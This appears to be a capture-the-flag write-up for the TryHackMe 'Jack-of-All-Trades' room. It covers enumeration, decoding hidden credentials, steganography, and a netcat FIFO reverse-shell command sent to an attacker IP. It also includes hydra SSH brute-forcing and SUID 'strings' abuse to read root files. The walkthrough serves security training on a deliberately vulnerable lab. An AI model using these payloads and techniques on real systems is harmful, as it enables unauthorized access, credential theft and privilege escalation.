# Jack-of-All-Trades

<figure><img src="https://1261483422-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FTAjoMGhyi4qD4wiYqHYf%2Fuploads%2FOzXkUynahl38uhjBAg5V%2FJack-of-All-Trades.jpeg?alt=media&#x26;token=00c37708-1322-4a7d-8258-a42cac6a9c54" alt=""><figcaption></figcaption></figure>

<p align="center"><a href="https://tryhackme.com/room/jackofalltrades">https://tryhackme.com/room/jackofalltrades</a></p>

***

## Enumeration

```bash
sudo nmap -p- -sS --min-rate 5000 -Pn -n -vv -oA nmap/Jack-of-All-Trades 10.66.188.30

PORT   STATE SERVICE REASON
22/tcp open  ssh     syn-ack ttl 62
80/tcp open  http    syn-ack ttl 62
```

```bash
nmap -p 22,80 -sCV -oA nmap/openPorts 10.66.188.30

PORT   STATE SERVICE VERSION
22/tcp open  http    Apache httpd 2.4.10 ((Debian))
|_ssh-hostkey: ERROR: Script execution failed (use -d to debug)
|_http-server-header: Apache/2.4.10 (Debian)
|_http-title: Jack-of-all-trades!
80/tcp open  ssh     OpenSSH 6.7p1 Debian 5 (protocol 2.0)
| ssh-hostkey: 
|   1024 13:b7:f0:a1:14:e2:d3:25:40:ff:4b:94:60:c5:00:3d (DSA)
|   2048 91:0c:d6:43:d9:40:c3:88:b1:be:35:0b:bc:b9:90:88 (RSA)
|   256 a3:fb:09:fb:50:80:71:8f:93:1f:8d:43:97:1e:dc:ab (ECDSA)
|_  256 65:21:e7:4e:7c:5a:e7:bc:c6:ff:68:ca:f1:cb:75:e3 (ED25519)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
```

```bash
curl http://10.66.188.30:22 -o index.html
```

```html
<html>
	<head>
		<title>Jack-of-all-trades!</title>
		<link href="assets/style.css" rel=stylesheet type=text/css>
	</head>
	<body>
		<img id="header" src="assets/header.jpg" width=100%>
		<h1>Welcome to Jack-of-all-trades!</h1>
		<main>
			<p>My name is Jack. I'm a toymaker by trade but I can do a little of anything -- hence the name!<br>I specialise in making children's toys (no relation to the big man in the red suit - promise!) but anything you want, feel free to get in contact and I'll see if I can help you out.</p>
			<p>My employment history includes 20 years as a penguin hunter, 5 years as a police officer and 8 months as a chef, but that's all behind me. I'm invested in other pursuits now!</p>
			<p>Please bear with me; I'm old, and at times I can be very forgetful. If you employ me you might find random notes lying around as reminders, but don't worry, I <em>always</em> clear up after myself.</p>
			<p>I love dinosaurs. I have a <em>huge</em> collection of models. Like this one:</p>
			<img src="assets/stego.jpg">
			<p>I make a lot of models myself, but I also do toys, like this one:</p>
			<img src="assets/jackinthebox.jpg">
			<!--Note to self - If I ever get locked out I can get back in at /recovery.php! -->
			<!--  UmVtZW1iZXIgdG8gd2lzaCBKb2hueSBHcmF2ZXMgd2VsbCB3aXRoIGhpcyBjcnlwdG8gam9iaHVudGluZyEgSGlzIGVuY29kaW5nIHN5c3RlbXMgYXJlIGFtYXppbmchIEFsc28gZ290dGEgcmVtZW1iZXIgeW91ciBwYXNzd29yZDogdT9XdEtTcmFxCg== -->
			<p>I hope you choose to employ me. I love making new friends!</p>
			<p>Hope to see you soon!</p>
			<p id="signature">Jack</p>
		</main>
	</body>
</html>
```

```bash
echo 'UmVtZW1iZXIgdG8gd2lzaCBKb2hueSBHcmF2ZXMgd2VsbCB3aXRoIGhpcyBjcnlwdG8gam9iaHVudGluZyEgSGlzIGVuY29kaW5nIHN5c3RlbXMgYXJlIGFtYXppbmchIEFsc28gZ290dGEgcmVtZW1iZXIgeW91ciBwYXNzd29yZDogdT9XdEtTcmFxCg==' | base64 -d

Remember to wish Johny Graves well with his crypto jobhunting! His encoding systems are amazing! Also gotta remember your password: u?WtKSraq
```

```bash
curl http://10.66.188.30:22/recovery.php -O
```

```html
<!DOCTYPE html>
<html>
	<head>
		<title>Recovery Page</title>
		<style>
			body{
				text-align: center;
			}
		</style>
	</head>
	<body>
		<h1>Hello Jack! Did you forget your machine password again?..</h1>	
		<form action="/recovery.php" method="POST">
			<label>Username:</label><br>
			<input name="user" type="text"><br>
			<label>Password:</label><br>
			<input name="pass" type="password"><br>
			<input type="submit" value="Submit">
		</form>
		<!-- GQ2TOMRXME3TEN3BGZTDOMRWGUZDANRXG42TMZJWG4ZDANRXG42TOMRSGA3TANRVG4ZDOMJXGI3DCNRXG43DMZJXHE3DMMRQGY3TMMRSGA3DONZVG4ZDEMBWGU3TENZQGYZDMOJXGI3DKNTDGIYDOOJWGI3TINZWGYYTEMBWMU3DKNZSGIYDONJXGY3TCNZRG4ZDMMJSGA3DENRRGIYDMNZXGU3TEMRQG42TMMRXME3TENRTGZSTONBXGIZDCMRQGU3DEMBXHA3DCNRSGZQTEMBXGU3DENTBGIYDOMZWGI3DKNZUG4ZDMNZXGM3DQNZZGIYDMYZWGI3DQMRQGZSTMNJXGIZGGMRQGY3DMMRSGA3TKNZSGY2TOMRSG43DMMRQGZSTEMBXGU3TMNRRGY3TGYJSGA3GMNZWGY3TEZJXHE3GGMTGGMZDINZWHE2GGNBUGMZDINQ=  -->
		 
	</body>
</html>
```

```bash
echo 'GQ2TOMRXME3TEN3BGZTDOMRWGUZDANRXG42TMZJWG4ZDANRXG42TOMRSGA3TANRVG4ZDOMJXGI3DCNRXG43DMZJXHE3DMMRQGY3TMMRSGA3DONZVG4ZDEMBWGU3TENZQGYZDMOJXGI3DKNTDGIYDOOJWGI3TINZWGYYTEMBWMU3DKNZSGIYDONJXGY3TCNZRG4ZDMMJSGA3DENRRGIYDMNZXGU3TEMRQG42TMMRXME3TENRTGZSTONBXGIZDCMRQGU3DEMBXHA3DCNRSGZQTEMBXGU3DENTBGIYDOMZWGI3DKNZUG4ZDMNZXGM3DQNZZGIYDMYZWGI3DQMRQGZSTMNJXGIZGGMRQGY3DMMRSGA3TKNZSGY2TOMRSG43DMMRQGZSTEMBXGU3TMNRRGY3TGYJSGA3GMNZWGY3TEZJXHE3GGMTGGMZDINZWHE2GGNBUGMZDINQ=' | base32 -d | xxd -r -p | tr 'A-Za-z' 'N-ZA-Mn-za-m'; echo

Remember that the credentials to the recovery login are hidden on the homepage! I know how forgetful you are, so here's a hint: bit.ly/2TvYQ2S
```
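The two notes above were peeled by hand (base64 for the homepage comment; base32, then hex, then ROT13 for the recovery page). As an added example that is not part of the original writeup, the Python below generalises those two pipelines: it recognises each layer from its alphabet (hex, base32, base64) or, for printable-but-unreadable text, by whether ROT13 improves an English marker-word score, and strips layers until the note reads as text. The marker-word list and the score threshold are my own heuristic; the two blobs are copied from the HTML comments on this page.

```python
import base64
import binascii
import codecs
import re
import string

# Constructed inputs: the two HTML comments found on the homepage and on /recovery.php above.
HOMEPAGE_NOTE = "UmVtZW1iZXIgdG8gd2lzaCBKb2hueSBHcmF2ZXMgd2VsbCB3aXRoIGhpcyBjcnlwdG8gam9iaHVudGluZyEgSGlzIGVuY29kaW5nIHN5c3RlbXMgYXJlIGFtYXppbmchIEFsc28gZ290dGEgcmVtZW1iZXIgeW91ciBwYXNzd29yZDogdT9XdEtTcmFxCg=="
RECOVERY_NOTE = "GQ2TOMRXME3TEN3BGZTDOMRWGUZDANRXG42TMZJWG4ZDANRXG42TOMRSGA3TANRVG4ZDOMJXGI3DCNRXG43DMZJXHE3DMMRQGY3TMMRSGA3DONZVG4ZDEMBWGU3TENZQGYZDMOJXGI3DKNTDGIYDOOJWGI3TINZWGYYTEMBWMU3DKNZSGIYDONJXGY3TCNZRG4ZDMMJSGA3DENRRGIYDMNZXGU3TEMRQG42TMMRXME3TENRTGZSTONBXGIZDCMRQGU3DEMBXHA3DCNRSGZQTEMBXGU3DENTBGIYDOMZWGI3DKNZUG4ZDMNZXGM3DQNZZGIYDMYZWGI3DQMRQGZSTMNJXGIZGGMRQGY3DMMRSGA3TKNZSGY2TOMRSG43DMMRQGZSTEMBXGU3TMNRRGY3TGYJSGA3GMNZWGY3TEZJXHE3GGMTGGMZDINZWHE2GGNBUGMZDINQ="

# Heuristic marker words (my own choice): encoded blobs and ROT13 text score zero on these.
ENGLISH_MARKERS = {"the", "to", "and", "you", "your", "that", "are", "is", "on",
                   "with", "so", "here's", "remember", "password", "his"}


def english_score(data: bytes) -> int:
    """Count marker words in printable ASCII; -1 when the bytes are not printable text."""
    try:
        text = data.decode("ascii")
    except UnicodeDecodeError:
        return -1
    if not all(ch in string.printable for ch in text):
        return -1
    return sum(1 for word in re.findall(r"[a-z']+", text.lower()) if word in ENGLISH_MARKERS)


def peel_layers(blob: str, max_layers: int = 8):
    """Strip one layer per pass (hex, base32, base64 by alphabet; ROT13 by score) -> (text, layers)."""
    data = blob.strip().encode()
    layers = []
    for _ in range(max_layers):
        if english_score(data) >= 2:
            return data.decode("ascii"), layers
        text = data.decode("ascii", errors="replace").strip()
        try:
            if re.fullmatch(r"[0-9a-fA-F]+", text) and len(text) % 2 == 0:
                data, layer = bytes.fromhex(text), "hex"
            elif re.fullmatch(r"[A-Z2-7]+={0,6}", text):
                data, layer = base64.b32decode(text), "base32"
            elif re.fullmatch(r"[A-Za-z0-9+/]+={0,2}", text):
                data, layer = base64.b64decode(text, validate=True), "base64"
            elif english_score(codecs.encode(text, "rot13").encode()) > english_score(data):
                data, layer = codecs.encode(text, "rot13").encode(), "rot13"
            else:
                break  # printable, but no recognisable layer left
        except (binascii.Error, ValueError):
            break
        layers.append(layer)
    return data.decode("ascii", errors="replace"), layers + ["unresolved"]
```

`peel_layers(RECOVERY_NOTE)` returns the decoded reminder together with `["base32", "hex", "rot13"]`, so the order of layers is recovered rather than guessed by trial and error.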

```bash
python -m http.server

Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
127.0.0.1 - - [30/Mar/2026 18:27:01] "GET / HTTP/1.1" 200 -
127.0.0.1 - - [30/Mar/2026 18:27:01] code 404, message File not found
127.0.0.1 - - [30/Mar/2026 18:27:01] "GET /assets/style.css HTTP/1.1" 404 -
127.0.0.1 - - [30/Mar/2026 18:27:01] code 404, message File not found
127.0.0.1 - - [30/Mar/2026 18:27:01] "GET /assets/header.jpg HTTP/1.1" 404 -
127.0.0.1 - - [30/Mar/2026 18:27:01] code 404, message File not found
127.0.0.1 - - [30/Mar/2026 18:27:01] "GET /assets/stego.jpg HTTP/1.1" 404 -
127.0.0.1 - - [30/Mar/2026 18:27:01] code 404, message File not found
127.0.0.1 - - [30/Mar/2026 18:27:01] "GET /assets/jackinthebox.jpg HTTP/1.1" 404 -
```

```bash
curl 10.66.188.30:22/assets/jackinthebox.jpg -O
curl 10.66.188.30:22/assets/style.css -O
curl 10.66.188.30:22/assets/header.jpg -O
curl 10.66.188.30:22/assets/stego.jpg -O
mkdir assets
mv jackinthebox.jpg stego.jpg style.css header.jpg assets/
```

```bash
python -m http.server

Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
127.0.0.1 - - [30/Mar/2026 18:36:16] "GET / HTTP/1.1" 304 -
127.0.0.1 - - [30/Mar/2026 18:36:16] "GET /assets/style.css HTTP/1.1" 200 -
127.0.0.1 - - [30/Mar/2026 18:36:16] "GET /assets/style.css HTTP/1.1" 200 -
127.0.0.1 - - [30/Mar/2026 18:36:16] "GET /assets/stego.jpg HTTP/1.1" 200 -
127.0.0.1 - - [30/Mar/2026 18:36:16] "GET /assets/jackinthebox.jpg HTTP/1.1" 200 -
127.0.0.1 - - [30/Mar/2026 18:36:16] "GET /assets/header.jpg HTTP/1.1" 200 -
```

```bash
steghide extract -sf header.jpg 
Enter passphrase: 
wrote extracted data to "cms.creds".
cat cms.creds 
Here you go Jack. Good thing you thought ahead!

Username: jackinthebox
Password: TplFxiSHjY
```

```bash
curl http://10.66.188.30:22/recovery.php -d 'user=jackinthebox&pass=TplFxiSHjY' -v

*   Trying 10.66.188.30:22...
* Established connection to 10.66.188.30 (10.66.188.30 port 22) from 192.168.192.129 port 60930 
* using HTTP/1.x
> POST /recovery.php HTTP/1.1
> Host: 10.66.188.30:22
> User-Agent: curl/8.19.0
> Accept: */*
> Content-Length: 33
> Content-Type: application/x-www-form-urlencoded
> 
* upload completely sent off: 33 bytes
< HTTP/1.1 302 Found
< Date: Mon, 30 Mar 2026 22:17:22 GMT
< Server: Apache/2.4.10 (Debian)
< Set-Cookie: PHPSESSID=54ui6jfgq8krldt7s6rug81nm1; path=/
< Expires: Thu, 19 Nov 1981 08:52:00 GMT
< Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
< Pragma: no-cache
< Set-Cookie: login=jackinthebox%3Aa78e6e9d6f7b9d0abe0ea866792b7d84; expires=Wed, 01-Apr-2026 22:17:22 GMT; Max-Age=172800
< location: /nnxhweOV/index.php
< Content-Length: 0
< Content-Type: text/html; charset=UTF-8
< 
* Connection #0 to host 10.66.188.30:22 left intact
```

```bash
curl -c cookies.txt -L http://10.66.188.30:22/recovery.php -d 'user=jackinthebox&pass=TplFxiSHjY'

GET me a 'cmd' and I'll run it for you Future-Jack.
```

```bash
curl -b cookies.txt http://10.66.188.30:22/nnxhweOV/index.php

GET me a 'cmd' and I'll run it for you Future-Jack.
```

## Exploitation

```bash
nc -lnvp 1111
Listening on 0.0.0.0 1111
```

```bash
curl -G -b cookies.txt http://10.66.188.30:22/nnxhweOV/index.php?cmd=ls --data-urlencode "cmd=rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.192.129 1111 >/tmp/f"

GET me a 'cmd' and I'll run it for you Future-Jack.
curl: (3) URL rejected: No host part in the URL
```

```bash
nc -lnvp 1111
Listening on 0.0.0.0 1111
Connection received on 10.66.188.30 57667
/bin/sh: 0: can't access tty; job control turned off
```

[interactive-shell](https://estebanzarate.gitbook.io/hackache/linux/interactive-shell "mention")

## Post-Exploitation

```bash
www-data@jack-of-all-trades:/var/www/html$ cd /home/
www-data@jack-of-all-trades:/home$ ls
jack  jacks_password_list
www-data@jack-of-all-trades:/home$ cat jacks_password_list 
*hclqAzj+2GC+=0K
eN<A@n^zI?FE$I5,
X<(@zo2XrEN)#MGC
,,aE1K,nW3Os,afb
ITMJpGGIqg1jn?>@
0HguX{,fgXPE;8yF
sjRUb4*@pz<*ZITu
[8V7o^gl(Gjt5[WB
yTq0jI$d}Ka<T}PD
Sc.[[2pL<>e)vC4}
9;}#q*,A4wd{<X.T
M41nrFt#PcV=(3%p
GZx.t)H$&awU;SO<
.MVettz]a;&Z;cAC
2fh%i9Pr5YiYIf51
TDF@mdEd3ZQ(]hBO
v]XBmwAk8vk5t3EF
9iYZeZGQGG9&W4d1
8TIFce;KjrBWTAY^
SeUAwt7EB#fY&+yt
n.FZvJ.x9sYe5s5d
8lN{)g32PG,1?[pM
z@e1PmlmQ%k5sDz@
ow5APF>6r,y4krSo
```

```bash
hydra -l jack -P passwords.txt -s 80 ssh://10.66.188.30 -t 4

Hydra v9.6 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2026-03-30 20:09:06
[DATA] max 4 tasks per 1 server, overall 4 tasks, 24 login tries (l:1/p:24), ~6 tries per task
[DATA] attacking ssh://10.66.188.30:80/
[80][ssh] host: 10.66.188.30   login: jack   password: ITMJpGGIqg1jn?>@
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2026-03-30 20:09:13
```

```bash
ssh jack@10.66.188.30 -p 80

** WARNING: connection is not using a post-quantum key exchange algorithm.
** This session may be vulnerable to "store now, decrypt later" attacks.
** The server may need to be upgraded. See https://openssh.com/pq.html
jack@10.66.188.30's password: 
jack@jack-of-all-trades:~$ 
```

```bash
jack@jack-of-all-trades:~$ ls -la
total 312
drwxr-x--- 3 jack jack   4096 Feb 29  2020 .
drwxr-xr-x 3 root root   4096 Feb 29  2020 ..
lrwxrwxrwx 1 root root      9 Feb 29  2020 .bash_history -> /dev/null
-rw-r--r-- 1 jack jack    220 Feb 29  2020 .bash_logout
-rw-r--r-- 1 jack jack   3515 Feb 29  2020 .bashrc
drwx------ 2 jack jack   4096 Feb 29  2020 .gnupg
-rw-r--r-- 1 jack jack    675 Feb 29  2020 .profile
-rwxr-x--- 1 jack jack 293302 Feb 28  2020 user.jpg
```

```bash
scp -P 80 jack@10.66.188.30:/home/jack/user.jpg /home/melvin/thm/

** WARNING: connection is not using a post-quantum key exchange algorithm.
** This session may be vulnerable to "store now, decrypt later" attacks.
** The server may need to be upgraded. See https://openssh.com/pq.html
jack@10.66.188.30's password: 
user.jpg
```

<figure><img src="https://1261483422-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FTAjoMGhyi4qD4wiYqHYf%2Fuploads%2FmshPmh7MVLSUM0wYVHeO%2FScreenshot%202026-03-30%20201711.png?alt=media&#x26;token=b344066e-4b03-483f-be3b-0238975aa81e" alt=""><figcaption></figcaption></figure>

## User flag

{% hint style="success" %}
sec\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*13}
{% endhint %}

## Privilege Escalation

```bash
jack@jack-of-all-trades:/$ find / -type f -perm -4000 2>/dev/null
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/pt_chown
/usr/bin/chsh
/usr/bin/at
/usr/bin/chfn
/usr/bin/newgrp
/usr/bin/strings
/usr/bin/sudo
/usr/bin/passwd
/usr/bin/gpasswd
/usr/bin/procmail
/usr/sbin/exim4
/bin/mount
/bin/umount
/bin/su
```

<https://gtfobins.org/gtfobins/strings/#file-read>

```bash
jack@jack-of-all-trades:/$ strings /root/root.txt
ToDo:
1.Get new penguin skin rug -- surely they won't miss one or two of those blasted creatures?
2.Make T-Rex model!
3.Meet up with Johny for a pint or two
4.Move the body from the garage, maybe my old buddy Bill from the force can help me hide her?
5.Remember to finish that contract for Lisa.
6.Delete this: sec*******************************************0a}
```

## Root flag

{% hint style="success" %}
sec\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*0a}
{% endhint %}
